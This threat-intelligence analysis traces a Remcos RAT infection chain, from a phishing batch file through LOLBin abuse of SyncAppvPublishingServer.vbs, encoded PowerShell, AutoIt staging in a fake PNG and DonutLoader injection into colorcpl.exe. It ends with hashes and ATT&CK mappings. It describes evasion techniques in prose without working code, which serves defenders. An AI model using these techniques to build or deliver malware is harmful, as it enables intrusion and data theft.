An analysis by John Dador & Mathew Dela Cruz
Overview
G Data Analysts discovered a new Remcos RAT infection chain which started with a seemingly harmless batch file that executes encoded commands. This batch file creates hidden directories and retrieves additional tools as well as encrypted payloads while blending into normal system activity.
Unlike earlier Remcos RAT campaigns documented by Fortinet and McAffee that mostly relied on PowerShell hosted .NET loaders to reflectively load assemblies in memory, this new infection incorporates DonutLoader shellcode and AutoIt-based staging to facilitate execution. This shifts Remcos RAT’s loader architecture away from managed .NET execution toward a more portable, runtime-independent in-memory payload delivery model.
Infection Chain
The illustration shows how Remcos RAT is delivered through a multi-stage execution chain involving scripts, Living-off-the-Land Binaries (LOLBins), and staged extraction ultimately delivering the final payload.
Initial Access
The infection begins with a phishing email containing a malicious Windows batch file named Bestellung.CMD as an attachment. We were not able to retrieve the phishing email itself. But the filename of the Windows batch file is a German word that directly translates to “Order”, which is a commonly used filename in phishing campaigns.
Execution follows, when the batch file launches cscript.exe, a legitimate Windows Script Host binary frequently abused as a LOLBin. It is one of two Windows Script Host (WSH) executables, acting as the console version of wscript.exe.
It then invokes SyncAppvPublishingServer.vbs, which is a legitimate Microsoft App-V component commonly present in enterprise Windows environments. It is considered to be a trusted part of normal system infrastructure, which makes it an attractive target for abuse as a LOLBin. It is then used to execute a malicious Base64-encoded payload passed as an argument. It runs silently by suppressing error messages and Windows Script Host banners, while PowerShell’s Invoke-Expression (IEX) decodes and executes the payload in memory.
Notably, the use of SyncAppvPublishingServer.vbs has not been widely documented in previous Remcos RAT campaigns, making this technique particularly noteworthy.
The obfuscated Base64 payload includes a simple string replacement routine (.Replace('QUBLQSVO','')) to remove inserted junk data prior to decoding. The SyncAppvPublishingServer.vbs acts as an execution proxy, forwarding the decoded Base64 content directly into PowerShell. This results in the execution of a PowerShell command configured to run in a non-interactive and hidden mode.
The PowerShell command then modifies the module search path to specifically load the modules from the current directory instead of system path. It then imports a module called AppvClient, a legitimate Windows module used in application virtualization, to make the activity appear benign.
The decoded Base64 payload contains instructions and commands that will download additional components for the next phase of infection.
Payload Staging and Tool Deployment
The PowerShell script downloads three additional files, legitimate 7Zip components (7z.exe and 7z.dll), and a password-protected iphdcrtj.zip from the cloud storage service pCloud (filedn[.]com), serving two primary objectives.
First, it ensures reliability of executing the infection in different Windows environments. By bundling its own tools, it reduces the reliance of locally installed utilities and mitigates potential execution failure due to lack of dependencies or restricted configurations. Second, password-protected files slows initial static inspection by requiring extraction prior to analysis and prevent file hosting services from catching malwares on their system.
Looking at the decoded PowerShell script, the structure and formatting of the commands used were unusually consistent. The presence of the code comments is something not typically seen in manually written malicious scripts. These characteristics suggest that the script may have been generated or refined using AI-assisted tools, which have become increasingly common in script development.
The downloaded password-protected archive file named iphdcrtj.zip contains a malicious JScript named iphdcrtj.js, which is dropped in the C:\Users\Public directory. This script is obfuscated, it contains junk strings to hinder static analysis. It drops two files. One is an AutoIt3 interpreter version 3.3.16.1 and the other a fake PNG image file.
The dropped AutoIt interpreter is then executed by the iphdcrtj.js to process the embedded data stored within the fake PNG file. Although the PNG appears to be a benign image file, it is an AutoIt script which contains encoded strings and API definitions that are extracted and decrypted at runtime. The embedded decoding routine uses a single-byte XOR with the constant key 0x63. The recovered data reveals multiple data structures and Windows API functions commonly used in process injection.
These data structures and APIs are used to dynamically reconstruct the next-stage payload in memory for injection into colorcpl.exe, the legitimate Windows Color Management utility.
Final Payload : Remcos RAT
The injected payload consists of a DonutLoader shellcode. A widely used open-sourced tool that produces a position-independent shellcode stub, which embeds a PE or .NET payload directly in memory. In various real-world campaigns such as the Beagle backdoor (which spread through fake Claude sites recently reported by Sophos), Donut-generated shellcode has been observed in loaders and infection chains delivering commodity such as RATs and information stealers. This is also evident in our recent analysis on loader-based threats like KissLoader, also shows a similar pattern where Donut-generated shellcode is used as an intermediate stage to decrypt and inject final payloads. However, the inclusion of these additional staging layers combined with the process injection can also increase the detection surface by providing defenders with more opportunities to intercept the malicious chain before the final payload is executed.
Fortunately, there is an open-source and reliable decryptor on Github. We used it to decrypt the DonutLoader shellcode. The decrypted output reveals that the payload is Remcos RAT version 7.2.1 Pro, a relatively new version.
Same RAT, just got Sweeter
This infection highlights the consistent reliance of Remcos RAT on techniques where payloads are decoded, staged and executed directly in memory during runtime. The use of multiple scripting layers such as PowerShell, VBScript and native Windows utilities suggests that this iteration of RemcosRAT is designed with stealth and operational flexibility in mind. Another consistent characteristic that warrants special attention is the extensive use of LOLBins. Legitimate Windows utilities are leveraged for proxy and in-memory execution evading early detection and blending malicious activity with normal system behavior.
Once successfully deployed, Remcos RAT functions as a full-featured Remote Access Trojan (RAT) that establishes communication with an attacker-controlled command-and-control (C2) server. After the connection is established, operators can remotely control the compromised host, execute commands, manage files, capture screenshots, log keystrokes, harvest credentials, activate webcams or microphones and deploy additional payloads. These capabilities were extensively documented and analyzed by Fortinet in its recent research on modern Remcos RAT activity.
While there are already clear similarities existing across Remcos RAT campaigns, this analysis reveals newer techniques incorporated. The introduction of shellcode for process injection generated by DonutLoader has not been widely observed in Remcos RAT infections prior to this activity. This suggests an evolving and continuous refinement of Remcos RAT’s evasion and execution methods.
IOCs
- Bestellung.CMD - 5B3089EEFAB0E043AF8894DE86022BDC6DF2F42F7098DBD530F42C0EC861D5D8 - Script.Trojan.Agent.BSQ
- iphdcrtj.js - 14A0D7978872A2739AC31EF42539E8C708AF6AFCCC5EB74F22FE2B676BFA2DF7 - Script.Trojan.Agent.VVW4LC
- USCSHBRBWUYUCQNUIBPWLVUFKIAGWBOOAKDDXWTGRUVHWXIHQQRQXJASLKLALICCV.png (AutoIt Script) - B9DA295C34ACCF3632C2C4B6D9E3C74791B4514D27814F79E9BCB77CE168A347 - Trojan.Generic.39655044
- Remcos RAT Payload - 48bd36c3b8d6a3bf5db4e7b0bbc1692e8cb900475dc7ae16e9f1fa7ba97c8adf - Win32.Backdoor.Remcos.TDW2LS
MITRE ATT&CK TTPs
Initial Access
T1566.001 – Spearphishing Attachment (malicious .cmd file via phishing)
Execution
T1059 – Command and Scripting Interpreter (AutoIt execution)
T1059.001 – PowerShell (Base64 payload via IEX)
T1059.003 – Windows Command Shell (.cmd execution)
T1059.005 – Visual Basic (VBScript via cscript.exe)
T1059.007 – JavaScript (obfuscated JS execution)
T1218 – Signed Binary Proxy Execution (cscript.exe and other LOLBins)
Defense Evasion
T1027 – Obfuscated/Compressed Files and Information (Base64 + junk data)
T1036 – Masquerading (fake names and PNG disguise)
T1140 – Deobfuscate/Decode Files or Information (XOR decoding)
T1564.003 – Hidden Window (hidden PowerShell execution)
Command and Control
T1071 – Application Layer Protocol (C2 communication)
T1219 – Remote Access Software (Remcos RAT payload)
Privilege Escalation
T1055 – Process Injection (inject into colorcpl.exe)
T1620 – Reflective Code Loading (Donut in-memory shellcode)
Exfiltration
T1560.001 – Archive via Utility (password-protected ZIP)
Command & Control / Staging Support
T1105 – Ingress Tool Transfer (downloads 7z and archive)
